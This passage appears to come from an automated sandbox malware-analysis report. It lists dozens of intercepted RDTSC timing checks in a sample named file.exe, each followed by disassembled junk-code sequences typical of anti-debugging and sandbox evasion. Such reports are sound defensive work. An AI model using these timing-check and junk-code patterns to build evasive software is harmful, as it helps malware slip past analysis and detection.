                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F57B7 second address: 7F57BC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5D93 second address: 7F5D97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5D97 second address: 7F5DB6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F701CDA8A6Ah 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jp 00007F701CDA8A66h 0x00000019 pop edx 0x0000001a push ecx 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F60DF second address: 7F6115 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F701CDC8376h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F701CDC837Eh 0x00000014 jmp 00007F701CDC8387h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 746A5A second address: 746AB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDA8A70h 0x00000007 pushad 0x00000008 jne 00007F701CDA8A66h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 pop eax 0x00000012 jmp 00007F701CDA8A6Ch 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d jmp 00007F701CDA8A6Ah 0x00000022 jmp 00007F701CDA8A6Ah 0x00000027 jmp 00007F701CDA8A72h 0x0000002c pushad 0x0000002d popad 0x0000002e popad 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 746AB5 second address: 746ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FFBD3 second address: 7FFBD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FFBD7 second address: 7FFBE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F701CDC8376h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80028D second address: 800293 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 800293 second address: 800297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74A1EE second address: 74A1FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74A1FC second address: 74A206 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F701CDC8376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74A206 second address: 74A23C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F701CDA8A79h 0x00000008 jmp 00007F701CDA8A71h 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007F701CDA8A66h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74A23C second address: 74A240 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80B2E6 second address: 80B2FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F701CDA8A66h 0x0000000f jns 00007F701CDA8A66h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 809616 second address: 80961A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80961A second address: 809629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F701CDA8A66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 809EC9 second address: 809EDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F701CDC837Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 809EDC second address: 809EF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F701CDA8A6Bh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80A04A second address: 80A067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F701CDC8382h 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80A190 second address: 80A19B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80A19B second address: 80A1A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80A1A0 second address: 80A1C3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d je 00007F701CDA8A66h 0x00000013 jno 00007F701CDA8A66h 0x00000019 jl 00007F701CDA8A66h 0x0000001f popad 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80A1C3 second address: 80A1DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F701CDC8383h 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80A1DB second address: 80A1E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80A1E1 second address: 80A1E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80A1E7 second address: 80A1EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 80A1EB second address: 80A1F1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 80A1F1 second address: 80A1FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 811A6E second address: 811A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 811A72 second address: 811A81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDA8A6Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 82B31C second address: 82B326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 82B326 second address: 82B380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F701CDA8A6Bh 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c js 00007F701CDA8A7Dh 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F701CDA8A75h 0x00000019 push esi 0x0000001a jmp 00007F701CDA8A6Ch 0x0000001f jmp 00007F701CDA8A79h 0x00000024 pop esi 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 82B380 second address: 82B386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 82B386 second address: 82B3A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007F701CDA8A6Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 82E223 second address: 82E24C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F701CDC8387h 0x00000009 jo 00007F701CDC837Eh 0x0000000f jne 00007F701CDC8376h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 82E24C second address: 82E252 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 82E252 second address: 82E258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 82E258 second address: 82E25C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 837B04 second address: 837B0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F701CDC8376h 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 837B0F second address: 837B19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F701CDA8A66h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 837B19 second address: 837B22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 840F28 second address: 840F2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 840F2E second address: 840F32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 83FFC4 second address: 83FFC9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 840271 second address: 840277 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 840277 second address: 84027B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 843FFE second address: 844002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 844002 second address: 844006 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 846185 second address: 8461B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F701CDC8376h 0x0000000c popad 0x0000000d ja 00007F701CDC838Fh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8461B1 second address: 8461B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 845C8E second address: 845CA6 instructions: 0x00000000 rdtsc 0x00000002 js 00007F701CDC8376h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jmp 00007F701CDC837Ah 0x00000012 pop esi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 845CA6 second address: 845CDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 jmp 00007F701CDA8A79h 0x00000018 pushad 0x00000019 jnc 00007F701CDA8A66h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 845CDB second address: 845CFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F701CDC8389h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 845E49 second address: 845E66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F701CDA8A78h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 845E66 second address: 845E6B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 845E6B second address: 845E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 845E71 second address: 845E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 855A72 second address: 855A8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F701CDA8A6Bh 0x0000000c jl 00007F701CDA8A66h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 855A8C second address: 855A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F701CDC837Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 863BD5 second address: 863BF3 instructions: 0x00000000 rdtsc 0x00000002 je 00007F701CDA8A71h 0x00000008 jmp 00007F701CDA8A6Bh 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jg 00007F701CDA8A66h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 873A7E second address: 873A97 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F701CDC8376h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F701CDC837Dh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 873A97 second address: 873AB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDA8A6Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 873AB0 second address: 873ABC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 872B36 second address: 872B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 872B3A second address: 872B54 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jno 00007F701CDC8376h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F701CDC8376h 0x00000014 jl 00007F701CDC8376h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 872B54 second address: 872B5E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 872B5E second address: 872B62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 872B62 second address: 872B89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 pop eax 0x00000009 jmp 00007F701CDA8A6Bh 0x0000000e pop ebx 0x0000000f popad 0x00000010 push ecx 0x00000011 pushad 0x00000012 jmp 00007F701CDA8A6Dh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 872F9A second address: 872FA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 872FA3 second address: 872FAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F701CDA8A66h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 872FAD second address: 872FC3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007F701CDC8378h 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8733CD second address: 8733EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007F701CDA8A66h 0x0000000d jmp 00007F701CDA8A74h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8733EE second address: 8733F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 873553 second address: 873560 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F701CDA8A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 873691 second address: 8736B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F701CDC8385h 0x00000009 popad 0x0000000a pop edx 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8736B1 second address: 8736B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 87668C second address: 876690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 876690 second address: 8766A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDA8A70h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 879A4B second address: 879A7D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F701CDC8376h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnl 00007F701CDC837Eh 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 jnc 00007F701CDC8376h 0x0000001c pop edi 0x0000001d jmp 00007F701CDC837Dh 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 879A7D second address: 879A83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8795F3 second address: 879612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F701CDC8389h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4DA020B second address: 4DA0211 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4DA0211 second address: 4DA0215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4DA0215 second address: 4DA0219 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4DA0219 second address: 4DA0265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a push ecx 0x0000000b mov edi, 68965888h 0x00000010 pop edi 0x00000011 call 00007F701CDC837Eh 0x00000016 mov si, 0591h 0x0000001a pop eax 0x0000001b popad 0x0000001c push eax 0x0000001d jmp 00007F701CDC837Ch 0x00000022 xchg eax, ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F701CDC8387h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4DA02B2 second address: 4DA02B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4DA02B6 second address: 4DA02BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4DA02BC second address: 4DA02C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4DA02C2 second address: 4DA02C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4DA02C6 second address: 4DA02F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F701CDA8A78h 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F701CDA8A6Dh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4DA02F9 second address: 4DA02FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4DA02FF second address: 4DA0316 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F701CDA8A73h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4DA0316 second address: 4DA0390 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDC8389h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d jmp 00007F701CDC837Ch 0x00000012 pushfd 0x00000013 jmp 00007F701CDC8382h 0x00000018 adc ecx, 66FCAB88h 0x0000001e jmp 00007F701CDC837Bh 0x00000023 popfd 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 jmp 00007F701CDC8386h 0x0000002c pop ebp 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F701CDC837Ah 0x00000036 rdtsc
